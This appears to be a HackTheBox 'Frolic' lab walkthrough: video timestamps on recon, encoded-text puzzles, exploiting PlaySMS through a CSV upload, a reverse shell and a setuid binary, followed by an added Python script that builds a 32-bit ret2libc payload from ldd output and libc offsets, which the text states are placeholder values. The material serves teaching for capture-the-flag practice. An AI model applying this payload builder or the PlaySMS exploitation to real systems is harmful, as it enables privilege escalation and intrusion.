HackTheBox - Frolic

01:16 - Begin of Recon, until around 13 minutes gathering information to avoid rabbit holes
04:04 - Using nc/ncat to verify a port is open (-zv)
11:17 - Doing gobuster across many of the subdirectories
13:03 - Examining /admin/ - Examine the HTML source because login is not sending any data
14:09 - Discover some weird text encoding (Ook), how I went about decoding it
15:44 - Decoded to base64 with some spaces, clean up the base64 and are left with a zip file
19:19 - After cracking the zip, there is another text encoding challenge (BrainF*)
25:11 - With potential information, return to our long running recon for more information
28:49 - Discovering /playsms
32:00 - Reading ExploitDB articles and then attempting to manually exploit PlaySMS via uploading a CSV
34:34 - Getting a reverse shell
39:00 - Running
40:00 - Finding the SetUID file: rop
42:00 - Exploiting ROP Program with ret2libc
45:30 - Getting offsets of system, exit, /bin/sh from libc using ldd, read
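The last two timestamps cover the classic 32-bit ret2libc recipe: take the libc load address from ldd, add the symbol offsets for system and exit and the offset of the "/bin/sh" string, and lay them out after the stack padding as [system][exit][&"/bin/sh"] so that system is called with "/bin/sh" and returns cleanly into exit. The script below is an added example and is not code from the video; it assumes a fixed libc base (no ASLR, or a base already leaked), and the ldd output, the libc byte slice, the padding length (52) and the system/exit offsets are constructed placeholder values, not measurements from the box.

```python
import re
import struct

# Constructed sample of `ldd ./rop` output (placeholder, not captured from the target).
LDD_OUTPUT = """\
\tlinux-gate.so.1 =>  (0xb7fd8000)
\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
\t/lib/ld-linux.so.2 (0xb7fda000)
"""

# Constructed stand-in for a slice of libc's read-only data; on a real target the
# offset comes from `strings -a -t x libc.so.6 | grep /bin/sh`.
FAKE_LIBC_BLOB = b"\x00" * 0x40 + b"/bin/sh\x00" + b"\x00" * 0x20

# Placeholder symbol offsets as `readelf -s libc.so.6 | grep -E ' (system|exit)@@'`
# would report them; these numbers are assumptions for the demo.
SYSTEM_OFF = 0x3A940
EXIT_OFF = 0x2E7B0
PADDING = 52  # assumed distance from buffer start to the saved return address


def libc_base_from_ldd(ldd_text: str) -> int:
    """Pull the libc.so.6 load address out of ldd output."""
    m = re.search(r"libc\.so\.6\s*=>\s*\S+\s*\((0x[0-9a-fA-F]+)\)", ldd_text)
    if not m:
        raise ValueError("libc.so.6 not found in ldd output")
    return int(m.group(1), 16)


def find_string_offset(libc_bytes: bytes, needle: bytes = b"/bin/sh\x00") -> int:
    """Offset of a NUL-terminated string inside the libc image (strings -t x equivalent)."""
    off = libc_bytes.find(needle)
    if off < 0:
        raise ValueError("string not present in libc image")
    return off


def build_ret2libc_payload(padding: int, libc_base: int,
                           system_off: int, exit_off: int, binsh_off: int) -> bytes:
    """32-bit ret2libc frame: [padding][system][exit as system's return][ptr to "/bin/sh"].

    When the overflowed function returns, execution lands in system(); the next
    dword is where system() returns (exit, so the process dies quietly instead of
    crashing), and the dword after that is system()'s first argument.
    """
    system = libc_base + system_off
    exit_ = libc_base + exit_off
    binsh = libc_base + binsh_off
    chain = struct.pack("<III", system, exit_, binsh)
    return b"A" * padding + chain


def chain_has_nul(payload: bytes, padding: int) -> bool:
    """True if any address in the chain contains 0x00 (would truncate a strcpy/gets-style copy)."""
    return b"\x00" in payload[padding:]


if __name__ == "__main__":
    base = libc_base_from_ldd(LDD_OUTPUT)
    binsh_off = find_string_offset(FAKE_LIBC_BLOB)
    payload = build_ret2libc_payload(PADDING, base, SYSTEM_OFF, EXIT_OFF, binsh_off)
    print(f"libc base   : {base:#010x}")
    print(f"system      : {base + SYSTEM_OFF:#010x}")
    print(f"exit        : {base + EXIT_OFF:#010x}")
    print(f"/bin/sh     : {base + binsh_off:#010x}")
    print(f"nul in chain: {chain_has_nul(payload, PADDING)}")
    # Feed it to the binary, e.g.: python3 rop_payload.py > payload; ./rop "$(cat payload)"
```

The NUL check matters because a chain address that contains 0x00 survives a read()-based overflow but is cut short by anything that treats the input as a C string; if it trips, pick a different libc gadget or string with a clean address.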